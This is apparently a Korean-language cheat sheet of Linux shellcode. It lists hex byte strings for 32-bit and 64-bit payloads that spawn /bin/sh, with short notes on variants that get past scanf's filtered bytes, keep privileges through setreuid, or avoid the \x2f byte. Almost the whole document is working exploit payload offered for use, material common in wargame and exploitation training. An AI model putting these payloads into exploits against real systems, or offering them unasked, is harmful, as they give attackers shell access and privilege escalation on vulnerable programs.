셸코드 모음

32bit shellcode

 

6 Bytes Shell Code
\x31\xc0\xb0\x01\xcd\x80

 

25 Bytes Shell Code (기본 쉘코드)
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

 

26 Bytes Shell Code (scanf 우회 쉘코드)

scanf는 [\x09, \x0a, \x0b, \x0c, \x0d](탭혹은 커서 명령어), \x20(스페이스바)를 읽지 못한다.

scanf는 빈칸을 입력 받을 때까지 입력을 받는다. 즉 빈칸은 취급하지 않는다. 

따라서 위의 hex값들은 scanf에서 받아들이지 않는다\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80

 

41 Bytes Shell Code   (setreuid(geteuid(), getreuid()) 포함)
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

 

48 Bytes Shell Code  (\x2f가 없는 쉘코드)
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

 

 

64bit shellcode

23 Bytes Shell Code (기본 쉘코드)
\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05

 

 

31 Bytes Shell Code
\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05